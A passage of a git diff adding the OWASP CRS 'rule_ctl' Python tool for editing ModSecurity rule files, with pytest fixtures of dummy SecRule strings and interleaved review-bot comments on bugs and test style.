len(actions) - 1 + for index, action in enumerate(actions): + action_name = action["act_name"] + action_order = 
ACTION_ORDER[action_name] + if action_order <= tag_order: + last_tag_line = action["lineno"] + new_act_list.append(action) + if not done and (action_order > tag_order or index == last_action_index): + done = True + new_act_list.append(new_tag) + if context.args.debug: + context.dprint(self.id, "append-tag", f"append tag {context.args.append_tag} on line {last_tag_line}", 0) + if action_order > tag_order: + new_act_list.append(action) + self.set_actions(new_act_list) + + def remove_tag(self, context): + if context.args.remove_tag is None: + return + + #TODO: support removing multiple tags + actions = self.get_actions() + new_act_list = [] + for action in actions: + if action["act_name"] == "tag": + if action["act_arg"] != context.args.remove_tag: + new_act_list.append(action) + else: + if context.args.debug: + context.dprint(self.id, "remove-tag", f"remove tag {context.args.remove_tag} on line {action['lineno']}", 0) + else: + new_act_list.append(action) + + self.set_actions(new_act_list) + + def rename_tag(self, context): + if context.args.rename_tag is None: + return + + match = self.TAG_RENAME_REGEX.match(context.args.rename_tag) + if match is None: + return + + old_tag = match.group(1) + new_tag = match.group(2) + new_act_list = [] + for act in self.get_actions(): + if act["act_name"] == "id": + current_rule_id = act["act_arg"] + if act["act_name"] == "tag": + if act["act_arg"] == old_tag: + act["act_arg"] = new_tag + if context.args.debug: + context.dprint(current_rule_id, "rename-tag", f"rename tag {old_tag} to {new_tag} on line {act['lineno']}", 0) + new_act_list.append(act) + else: + new_act_list.append(act) + self.set_actions(new_act_list) + + def append_action(self, context): + if context.args.append_action is None: + return + + match = self.ACTION_REPLACE_VALUES_REGEX.match(context.args.append_action) + if match is None: + return + + new_action_name = match.group(1) + new_action_value = match.group(2) or "" + + #TODO: support appending multiple actions + 
actions = self.get_actions() + if ( + new_action_name in [action["act_name"] for action in actions] and + new_action_value in [action["act_arg"] for action in actions] + ): + return + + new_act_list = [] + last_action_line = 0 + new_action_order = ACTION_ORDER[new_action_name] + has_quotes = len(new_action_value) > 0 and new_action_value[0] in '"\'' and new_action_value[-1] in '"\'' + if has_quotes: + new_action_value = new_action_value[1:-1] + new_action = { + 'id': uuid.uuid4(), + 'act_name': new_action_name, + 'lineno': 0, + 'act_quote': 'quotes' if has_quotes else 'no_quote', + 'act_arg': new_action_value, + 'act_arg_val': '', + 'act_arg_val_param': '', + 'act_arg_val_param_val': '' + } + + done = False + last_action_index = len(actions) - 1 + for index, action in enumerate(actions): + action_name = action["act_name"] + action_order = ACTION_ORDER[action_name] + if action_order <= new_action_order: + last_action_line = action["lineno"] + new_act_list.append(action) + if not done and (action_order > new_action_order or index == last_action_index): + done = True + new_act_list.append(new_action) + if context.args.debug: + context.dprint(self.id, "append-action", f"append action {context.args.append_action} on line {last_action_line}", 0) + if action_order > new_action_order: + new_act_list.append(action) + + if len(new_act_list) == 0: + new_act_list.append(new_action) + + self.set_actions(new_act_list) + + + + def replace_action(self, context): + if context.args.replace_action is None: + return + + match = self.ACTION_REPLACE_REGEX.match(context.args.replace_action) + if match is None: + return + + from_string = match.group(1) + to_string = match.group(2) + from_match = self.ACTION_REPLACE_VALUES_REGEX.match(from_string) + to_match = self.ACTION_REPLACE_VALUES_REGEX.match(to_string) + if from_match is None or to_match is None: + return + + from_actname = from_match.group(1) + from_actvalue = from_match.group(2) or "" + to_actname = to_match.group(1) + to_actvalue 
= to_match.group(2) or "" + has_quotes = len(to_actvalue) > 0 and to_actvalue[0] in '"\'' and to_actvalue[-1] in '"\'' + if has_quotes: + to_actvalue = to_actvalue[1:-1] + + for act in self.get_actions(): + if act["act_name"] == from_actname: + # match all actions of the specified name if `from_actvalue` is empty + if len(from_actvalue) == 0 or act["act_arg"] == from_actvalue: + act["act_name"] = to_actname + act["act_arg"] = to_actvalue + act["act_quote"] = "quotes" if has_quotes else "no_quote" + + def remove_action(self, context): + if context.args.remove_action is None: + return + + actions = self.get_actions() + new_act_list = [] + for action in actions: + if action["act_name"] != context.args.remove_action: + new_act_list.append(action) + + self.set_actions(new_act_list) + + def append_tfunc(self, context): + if context.args.append_tfunc is None: + return + + transform_order = ACTION_ORDER["t"] + actions = self.get_actions() + last_action_index = len(actions) - 1 + transformation_names = [action["act_arg"] for action in actions if action["act_name"] == "t"] + + for tfunc in context.args.append_tfunc: + if tfunc in transformation_names: + continue + + new_act_list = [] + done = False + last_lineno = 0 + for index, act in enumerate(actions): + action_name = act["act_name"] + action_order = ACTION_ORDER[action_name] + if action_order <= transform_order: + last_lineno = act["lineno"] + new_act_list.append(act) + if not done and (action_order > transform_order or index == last_action_index): + done = True + new_act_list.append({ + 'id': uuid.uuid4(), + 'act_name': 't', + 'lineno': last_lineno, + 'act_quote': 'no_quote', + 'act_arg': tfunc, + 'act_arg_val': '', + 'act_arg_val_param': '', + 'act_arg_val_param_val': '' + }) + if context.args.debug: + context.dprint(self.id, "append-tfunc", f"append transformation {context.args.append_tfunc} on line {last_lineno}", 0) + if action_order > transform_order: + new_act_list.append(act) + actions = new_act_list + + 
self.set_actions(actions) + + + def remove_tfunc(self, context): + if context.args.remove_tfunc is None: + return + + actions = self.get_actions() + for tfunc in context.args.remove_tfunc: + new_act_list = [] + for act in actions: + if act["act_name"] == "t": + if act["act_arg"] != tfunc: + new_act_list.append(act) + else: + new_act_list.append(act) + actions = new_act_list + + self.set_actions(actions) + + + def append_variables(self, context): + if context.args.append_variable is None: + return + + variables = self.get_variables() + for nv in context.args.append_variable: + newvar = self._parse_var(nv) + if self._has_variable(newvar): + continue + + new_var_list = [] + for v in variables: + new_var_list.append(v) + new_var_list.append({ + "variable": newvar["variable"], + "variable_part": newvar["variable_part"], + "quote_type": "no_quote", + "negated": newvar["negated"], + "counter": newvar["counter"] + }) + if context.args.debug: + context.dprint(self.id, "append-variable", f"Append variable {newvar}:{newvar['variable_part']}", 0) + variables = new_var_list + + self.set_variables(variables) + + + def remove_variables(self, context): + if context.args.remove_variable is None: + return + + variables = self.get_variables() + for nv in context.args.remove_variable: + var = self._parse_var(nv) + if not self._has_variable(var): + continue + + new_var_list = [] + for v in variables: + if not self._is_equal_variable(var, v): + new_var_list.append(v) + else: + if context.args.debug: + varpart = var["variable_part"] + negated = var["negated"] + counter = var["counter"] + context.dprint(self.id, "remove-variable", f"Removed variable {var}:{varpart} negated:{negated} counter:{counter}", 0) + variables = new_var_list + self.set_variables(variables) + + + def replace_variables(self, context): + if context.args.replace_variable is None: + return + + variables = self.get_variables() + for nv_tosplit in context.args.replace_variable: + oldvar, newvar = nv_tosplit.split(",") + 
ov = self._parse_var(oldvar) + nv = self._parse_var(newvar) + + new_variable = nv["variable"] + newvarpart = nv["variable_part"] + newnegated = nv["negated"] + newcounter = nv["counter"] + newquotetype = nv["quote_type"] + old_variable = ov["variable"] + oldvarpart = ov["variable_part"] + oldnegated = ov["negated"] + oldcounter = ov["counter"] + oldquotetype = ov["quote_type"] + new_var_list = [] + for v in variables: + if (v["variable"] == old_variable and v["variable_part"] == oldvarpart + and v["negated"] == oldnegated and v["counter"] == oldcounter and v["quote_type"] == oldquotetype): + new_var_list.append({ + "variable": new_variable, + "variable_part": newvarpart, + "quote_type": newquotetype, + "negated": newnegated, + "counter": newcounter + }) + if context.args.debug: + context.dprint(self.id, "replace-variable", f"Replaced variable {oldvar}:{oldvarpart} negated:{oldnegated} counter:{oldcounter} quote_type:{oldquotetype} with {newvar}:{newvarpart} negated:{newnegated} counter:{newcounter} quote_type:{newquotetype}", 0) + else: + new_var_list.append(v) + variables = new_var_list + + self.set_variables(variables) + + def append_ctl(self, context): + # TODO: support appending multiple ctl + if context.args.append_ctl is None: + return + + match = self.CTL_APPEND_REGEX.match(context.args.append_ctl) + if match is None: + return + + arg = match.group(1) + if arg.startswith('ctl:'): + arg = arg[4:] + val = match.group(2) + + params = self.CTL_APPEND_PARAMS_REGEX.match(match.group(3)) + param = params.group(1) if params is not None else "" + paramval = params.group(2) if params is not None else "" + + ctls = self.get_ctls() + if ( + arg in [ctl["act_arg"] for ctl in ctls] and + val in [ctl["act_arg_val"] for ctl in ctls] and + param in [ctl["act_arg_val_param"] for ctl in ctls] and + paramval in [ctl["act_arg_val_param_val"] for ctl in ctls] + ): + return + + actions = self.get_actions() + new_act_list = [] + last_ctl_line = 0 + ctl_order = ACTION_ORDER["ctl"] + 
new_ctl = { + "id": uuid.uuid4(), + "act_name": "ctl", + "lineno": last_ctl_line, + "act_quote": "no_quote", + "act_arg": arg, + "act_arg_val": val, + "act_arg_val_param": param, + "act_arg_val_param_val": paramval + } + + done = False + last_action_index = len(actions) - 1 + for index, action in enumerate(actions): + action_name = action["act_name"] + action_order = ACTION_ORDER[action_name] + if action_order <= ctl_order: + last_ctl_line = action["lineno"] + new_act_list.append(action) + if not done and (action_order > ctl_order or index == last_action_index): + done = True + new_act_list.append(new_ctl) + if context.args.debug: + context.dprint(self.id, "append-ctl", f"append ctl {context.args.append_ctl} on line {last_ctl_line}", 0) + if action_order > ctl_order: + new_act_list.append(action) + + if len(new_act_list) == 0: + new_act_list.append(new_ctl) + + self.set_actions(new_act_list) + + + def sort_tags(self, context): + #TODO: tags don't need to be grouped together; need to look through all actions + if not context.args.sort_tags: + return + + new_act_list = [] + post_tag_actions = [] + tags = [] + last_lineno = None + found_tag = False + for act in self.get_actions(): + if act["act_name"] == "tag": + tags.append(act) + found_tag = True + if last_lineno is None: + first_lineno = act["lineno"] + elif not found_tag: + new_act_list.append(act) + elif found_tag: + post_tag_actions.append(act) + + def get_sort_key(tag): + return tag["act_arg"].lower() + + sorted_tags = sorted(tags, key=get_sort_key) + for tag in sorted_tags: + new_act_list.append(tag) + tag["lineno"] = first_lineno + first_lineno += 1 + + for act in post_tag_actions: + new_act_list.append(act) + + self.set_actions(new_act_list) + +class Comment(RuleFileItem): + pass + +class Directive(RuleFileItem): + pass + +class SecRule(SecAction): + _is_chained = False + + def __init__(self, data, context): + super().__init__(data, context) + + # for chained rules (they have no ID) + if self.id is None: + 
self.id = context.get_chain_starter_rule(self).id + self._is_chained = True + + def has_chained_rules(self): + return self._data["chained"] + + def is_chained(self): + return self._is_chained + + def modify(self, context): + if context.args.skip_chain and self.is_chained(): + return + + super().modify(context) + + +def write_output(context): + if context.args.dryrun and context.args.output_json: + print(json.dumps(context.generate_lines(), indent=4)) + return + + if context.args.dryrun: + if not context.args.silent: + print("\n".join(context.generate_output())) + return + + path = context.args.target_file if context.args.target_file else context.args.config + with open(path, 'w') as handle: + handle.write("\n".join(context.generate_output())) + + +def run(): + context = Context() + context.parse_arguments() + + with open(context.args.config) as file: + data = file.read() + + for rule in context.parse_rules(data): + rule.modify(context) + + write_output(context) + +if __name__ == '__main__': + run() diff --git a/nginx/config/owasp-crs/util/rule_ctl/tests/__init__.py b/nginx/config/owasp-crs/util/rule_ctl/tests/__init__.py new file mode 100644 index 00000000..e69de29b diff --git a/nginx/config/owasp-crs/util/rule_ctl/tests/helpers.py b/nginx/config/owasp-crs/util/rule_ctl/tests/helpers.py new file mode 100644 index 00000000..52829f2b --- /dev/null +++ b/nginx/config/owasp-crs/util/rule_ctl/tests/helpers.py @@ -0,0 +1,16 @@ +from rule_ctl import Context + +def create_context(arguments, rules_string): + context = Context() + patched_arguments = arguments + if "--config" not in arguments: + patched_arguments = arguments + ["--config", "dummy"] + context.parse_arguments(args=patched_arguments) + + for rule in context.parse_rules(rules_string): + rule.modify(context) + return context + + +def get_output(context): + return "\n".join(context.generate_output()) + "\n" 
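Review bot: In `SecAction.__init__`, `self._line_numbers[("action", uuid)] = action["lineno"]` keys every action's line number under the `uuid` module object rather than the per-action id, so all entries collapse into one slot and the lookup `self._line_numbers[("action", action["id"])]` in `_update_line_numbers` can never hit — the `except KeyError` fallback is the only path ever taken and the original action line positions are silently lost; the preceding loop also `break`s at the `id` action, so actions after it never receive an `"id"` key at all. Fix both by dropping that `break` and keying the entry as `self._line_numbers[("action", action["id"])] = action["lineno"]`. `rename_tag` only binds `current_rule_id` when an `id` action precedes the tag, so on a chained rule (which has no `id` action) a `--debug` run raises `UnboundLocalError` at the `dprint` call; the sibling methods pass `self.id`, which `SecRule.__init__` sets for chained rules too, and this one should do the same. The import guard at the top uses a bare `except:`, which turns any exception raised while importing `msc_pyparser` (a `SyntaxError`, even a `KeyboardInterrupt`) into the misleading "missing modules" message; narrow it to `except ImportError:`.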
diff --git a/nginx/config/owasp-crs/util/rule_ctl/tests/rule_ctl_actions_test.py b/nginx/config/owasp-crs/util/rule_ctl/tests/rule_ctl_actions_test.py
new file mode 100644
index 00000000..f5657a3b
--- /dev/null
+++ b/nginx/config/owasp-crs/util/rule_ctl/tests/rule_ctl_actions_test.py
@@ -0,0 +1,377 @@ +from .helpers import * + +class TestAppendAction: + def test_append_action_with_no_actions(self): + arguments = [ + "--append-action", "msg:foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,msg:foo" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_action_with_existing_actions(self): + arguments = [ + "--append-action", "msg:foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + log:'abc'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + log:'abc',\\ + msg:foo" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_action_with_duplicate_action(self): + arguments = [ + "--append-action", "msg:foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + msg:'foo',\\ + log:'abc'" +""" + + context = create_context(arguments, rule_string) + assert rule_string == get_output(context) + + def test_append_action_in_correct_order(self): + arguments = [ + "--append-action", "msg:foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + noauditlog,\\ + logdata:'data'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + noauditlog,\\ + msg:foo,\\ + logdata:'data'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_action_with_chain(self): + arguments = [ + "--append-action", "msg:foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + noauditlog,\\ + logdata:'data',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx bar" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + 
"id:12,\\ + deny,\\ + noauditlog,\\ + msg:foo,\\ + logdata:'data',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx bar" \\ + "msg:foo" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_action_skip_chain(self): + arguments = [ + "--append-action", "msg:foo", + "--skip-chain" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + noauditlog,\\ + logdata:'data',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx bar" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + noauditlog,\\ + msg:foo,\\ + logdata:'data',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx bar" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + +class TestReplaceAction: + def test_replace_action_with_no_actions(self): + arguments = [ + "--replace-action", "msg:foo,msg:bar", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = rule_string + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_replace_action_with_existing_actions(self): + arguments = [ + "--replace-action", "msg:foo,msg:bar", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + msg:bar,\\ + log:'abc'" +""" + expected = rule_string + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_replace_action_with_duplicate_action(self): + arguments = [ + "--replace-action", "msg:foo,msg:bar", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + msg:'foo',\\ + msg:'abc'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + msg:bar,\\ + msg:'abc'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def 
test_replace_action_with_different_name(self): + arguments = [ + "--replace-action", "msg:foo,deny", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + msg:'foo',\\ + msg:'abc'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + msg:'abc'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + arguments = [ + "--replace-action", "deny,msg:foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + msg:'abc'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + msg:foo,\\ + msg:'abc'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_replace_action_without_values(self): + arguments = [ + "--replace-action", "pass,deny", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + pass,\\ + msg:'abc'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + msg:'abc'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_replace_action_with_for_any_value(self): + arguments = [ + "--replace-action", "msg,msg:bar", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + msg:something,\\ + msg:'or',\\ + msg:other" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + msg:bar,\\ + msg:bar,\\ + msg:bar" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_replace_action_with_quotes(self): + arguments = [ + "--replace-action", "msg,msg:'bar'", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + msg:something,\\ + msg:'or',\\ + msg:other" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + msg:'bar',\\ + 
msg:'bar',\\ + msg:'bar'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_replace_action_with_chain(self): + arguments = [ + "--replace-action", "msg:foo,msg:bar", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + msg:'foo',\\ + msg:'abc',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx bar" \\ + "msg:'foo'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + msg:bar,\\ + msg:'abc',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx bar" \\ + "msg:bar" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_replace_action_skip_chain(self): + arguments = [ + "--replace-action", "msg:foo,msg:bar", + "--skip-chain" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + msg:'foo',\\ + msg:'abc',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx bar" \\ + "msg:'foo'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + msg:bar,\\ + msg:'abc',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx bar" \\ + "msg:'foo'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) diff --git a/nginx/config/owasp-crs/util/rule_ctl/tests/rule_ctl_ctl_test.py b/nginx/config/owasp-crs/util/rule_ctl/tests/rule_ctl_ctl_test.py new file mode 100644 index 00000000..efcf9052 --- /dev/null +++ b/nginx/config/owasp-crs/util/rule_ctl/tests/rule_ctl_ctl_test.py 
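Review bot: `test_replace_action_with_different_name` packs two independent scenarios into one test body (the `msg:foo,deny` replacement and then, after reassigning `arguments`/`rule_string`/`expected`, the reverse `deny,msg:foo` case), so a failure in the first assertion hides the result of the second; splitting it into `test_replace_action_with_value_to_bare` and `test_replace_action_bare_to_value` keeps each failure self-describing. The module also uses `from .helpers import *`, which pulls `Context` and whatever else helpers.py re-exports into every test module's namespace; `from .helpers import create_context, get_output` is explicit and satisfies linters. The same wildcard import appears in rule_ctl_ctl_test.py, rule_ctl_tags_test.py, rule_ctl_test.py, rule_ctl_transformations_test.py and rule_ctl_variables_test.py in this diff.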
@@ -0,0 +1,125 @@ +from .helpers import * + +class TestAppendControl: + def test_append_ctl_with_no_ctls(self): + arguments = [ + "--append-ctl", "ruleRemoveTargetById=1234;ARGS:passwd", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,ctl:ruleRemoveTargetById=1234;ARGS:passwd" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_ctl_with_existing_ctls(self): + arguments = [ + "--append-ctl", "ruleRemoveTargetById=1234;ARGS:passwd", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + ctl:ruleRemoveTargetById=1234;ARGS:username" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + ctl:ruleRemoveTargetById=1234;ARGS:username,\\ + ctl:ruleRemoveTargetById=1234;ARGS:passwd" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_ctl_with_duplicate_ctl(self): + arguments = [ + "--append-ctl", "ruleRemoveTargetById=1234;ARGS:passwd", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + ctl:ruleRemoveTargetById=1234;ARGS:passwd,\\ + log:'abc'" +""" + + context = create_context(arguments, rule_string) + assert rule_string == get_output(context) + + def test_append_ctl_in_correct_order(self): + arguments = [ + "--append-ctl", "ruleRemoveTargetById=1234;ARGS:passwd", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + sanitiseMatchedBytes,\\ + ver:3" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + sanitiseMatchedBytes,\\ + ctl:ruleRemoveTargetById=1234;ARGS:passwd,\\ + ver:3" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_append_ctl_ignores_ctl_prefix(self): + arguments = [ + 
"--append-ctl", "ctl:ruleRemoveTargetById=1234;ARGS:passwd", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,ctl:ruleRemoveTargetById=1234;ARGS:passwd" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_append_ctl_with_chain(self): + arguments = [ + "--append-ctl", "ctl:ruleRemoveTargetById=1234;ARGS:passwd", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx bar" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,ctl:ruleRemoveTargetById=1234;ARGS:passwd,chain" + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx bar" "ctl:ruleRemoveTargetById=1234;ARGS:passwd" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_append_ctl_skip_chain(self): + arguments = [ + "--append-ctl", "ctl:ruleRemoveTargetById=1234;ARGS:passwd", + "--skip-chain" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx bar" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,ctl:ruleRemoveTargetById=1234;ARGS:passwd,chain" + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx bar" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) diff --git a/nginx/config/owasp-crs/util/rule_ctl/tests/rule_ctl_tags_test.py b/nginx/config/owasp-crs/util/rule_ctl/tests/rule_ctl_tags_test.py new file mode 100644 index 00000000..a65e66ef --- /dev/null +++ b/nginx/config/owasp-crs/util/rule_ctl/tests/rule_ctl_tags_test.py 
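Review bot: `test_append_ctl_in_correct_order` pins that a new `ctl:` lands after `sanitiseMatchedBytes` and before `ver:3`, but nothing in the file says where that ordering rule comes from, so a reader cannot tell whether a future reorder is a regression or a deliberate change to the tool's action-ordering table. A one-line comment above the expected fixture would settle it, e.g. `# rule_ctl emits actions in its fixed canonical order; ctl must precede ver`, ideally naming the ordering source in rule_ctl.py. The same applies to the ordering assertions in the actions, tags and transformations test modules of this diff.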
@@ -0,0 +1,395 @@ +from .helpers import * + +class TestAppendTag: + def test_append_tag_with_no_tags(self): + arguments = [ + "--append-tag", "foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,tag:'foo'" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_tag_with_existing_tags(self): + arguments = [ + "--append-tag", "foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + tag:'abc'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + tag:'abc',\\ + tag:'foo'" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_tag_with_duplicate_tag(self): + arguments = [ + "--append-tag", "foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + tag:'foo',\\ + tag:'abc'" +""" + + context = create_context(arguments, rule_string) + assert rule_string == get_output(context) + + def test_append_tag_in_correct_order(self): + arguments = [ + "--append-tag", "foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + log:'log',\\ + logdata:'data',\\ + sanitiseArg:arg" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + log:'log',\\ + logdata:'data',\\ + tag:'foo',\\ + sanitiseArg:arg" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_append_tag_with_chain(self): + arguments = [ + "--append-tag", "foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + log:'log',\\ + logdata:'data',\\ + sanitiseArg:arg,\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx bar" \\ + "deny" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" 
\\ + "id:12,\\ + deny,\\ + log:'log',\\ + logdata:'data',\\ + tag:'foo',\\ + sanitiseArg:arg,\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx bar" \\ + "deny,\\ + tag:'foo'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_append_tag_skip_chain(self): + arguments = [ + "--append-tag", "foo", + "--skip-chain" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + log:'log',\\ + logdata:'data',\\ + sanitiseArg:arg,\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx bar" \\ + "deny" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + log:'log',\\ + logdata:'data',\\ + tag:'foo',\\ + sanitiseArg:arg,\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx bar" \\ + "deny" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + +class TestRemoveTag: + def test_remove_tag_with_no_tags(self): + arguments = [ + "--remove-tag", "foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = rule_string + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_remove_tag_with_existing_tags(self): + arguments = [ + "--remove-tag", "foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,tag:foo" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_remove_tag_with_chain(self): + arguments = [ + 